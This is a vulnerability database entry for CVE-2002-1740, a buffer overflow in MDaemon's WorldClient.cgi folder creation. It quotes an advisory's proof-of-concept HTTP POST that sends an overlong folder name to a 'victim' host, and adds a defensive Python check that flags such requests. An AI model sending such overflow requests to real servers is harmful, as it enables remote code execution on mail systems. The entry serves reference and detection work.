MDaemon Folder Creation Remote Buffer Overflow Vulnerability


Vulnerability ID: 1106715  Vulnerability type: Boundary condition error
Published: 2002-05-07  Updated: 2005-10-20
CVE ID: CVE-2002-1740
CNNVD-ID: CNNVD-200212-429
Platform: Windows  CVSS score: 2.1
|Source
https://www.exploit-db.com/exploits/21439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-429
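|Vulnerability details
MDaemon is a program that integrates a mail transfer agent, webmail, and mail anti-virus, and runs on Microsoft Windows operating systems. When creating a user folder, MDaemon does not adequately check the length of the folder name, which can allow a remote attacker to execute arbitrary commands on the target system with the privileges of the MDaemon process. The folder-creation operation in the WorldClient web interface lacks a proper check on overly long folder names, so an attacker can submit an excessively long string as the folder name to the WorldClient.cgi script. This can overflow a buffer while the folder is being created, and carefully constructed string data may execute arbitrary commands on the target system with the privileges of the MDaemon process. An attacker must authenticate before submitting such a URL, but because MDaemon has a default account vulnerability, any remote user can exploit this vulnerability.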
|Exploit
source: http://www.securityfocus.com/bid/4689/info

MDaemon is an integrated mail transport agent, webmail, and mail anti-virus package. It is available for Microsoft Windows operating systems.

It may be possible for a remote user to take advantage of a buffer overflow in the MDaemon software package. The WorldClient.cgi program packaged with MDaemon does not properly check bounds on user-supplied data. During the process of creating a folder with a long name, it is possible to exploit a buffer overflow in the CGI that could result in the overwriting of process memory, and execution of attacker-supplied instructions.

POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3000
Content-Length: 1636
Connection: Keep-Alive
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxxx

OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder=AAAAAAAAAAAA
AAA[BUFFER_HERE_1000+chars]&NewFolderParent=&Create=Create&Folder%3AInbo
x=Inbox&Folder%3ADrafts=Drafts&Folder%3ASent=Sent&Folder%3ATrash=Trash&F
older%3As=s
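
As an added example (not part of the original advisory or of MDaemon's code), the following Python check shows how a reverse proxy or log pipeline could flag requests like the one above: it reports WorldClient.cgi POSTs whose NewFolder value exceeds a length limit, measured after percent-decoding. The 255-byte limit, the function names and the sample host are assumptions, and the sample requests are constructed.

```python
from urllib.parse import urlsplit, parse_qs

MAX_FOLDER_NAME = 255           # assumed policy limit; the advisory gives no safe length
FOLDER_FIELDS = ("NewFolder",)  # form field that carries the name in the request above


def oversized_folder_fields(raw: bytes, limit: int = MAX_FOLDER_NAME):
    """Return [(field, decoded_length)] for folder-name fields longer than limit."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return []
    if not urlsplit(parts[1]).path.lower().endswith("/worldclient.cgi"):
        return []
    # latin-1 maps one byte to one character, so len() below counts the bytes
    # the CGI would receive after percent-decoding, not the encoded length.
    form = parse_qs(body.decode("latin-1"), keep_blank_values=True,
                    encoding="latin-1")
    hits = []
    for field in FOLDER_FIELDS:
        for value in form.get(field, []):  # repeated fields are all checked
            if len(value) > limit:
                hits.append((field, len(value)))
    return hits


def build_request(new_folder: str) -> bytes:
    """Constructed sample request, modelled on the one shown above."""
    body = ("OldFolderParent=&OldFolder=&FolderParent=&Folder=&NewFolder="
            + new_folder + "&NewFolderParent=&Create=Create").encode("latin-1")
    head = ("POST /WorldClient.cgi?Session=xxxx&View=Options-Folders&Reload=Yes HTTP/1.1\r\n"
            "Host: mail.example:3000\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode("latin-1")
    return head + body


if __name__ == "__main__":
    samples = {
        "normal name": build_request("Projects"),
        "long name": build_request("A" * 1200),
        "percent-encoded short name": build_request("%41" * 100),
    }
    for label, raw in samples.items():
        print(label, "->", oversized_folder_fields(raw) or "ok")
```

Measuring the decoded value avoids both false positives on heavily percent-encoded short names and misses when a limit is compared against the wrong representation.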
|References

Source: XF
Name: mdaemon-worldclient-foldername-bo(9026)
Link: http://xforce.iss.net/xforce/xfdb/9026
Source: BID
Name: 4689
Link: http://www.securityfocus.com/bid/4689
Source: NSFOCUS
Name: 2739
Link: http://www.nsfocus.net/vulndb/2739
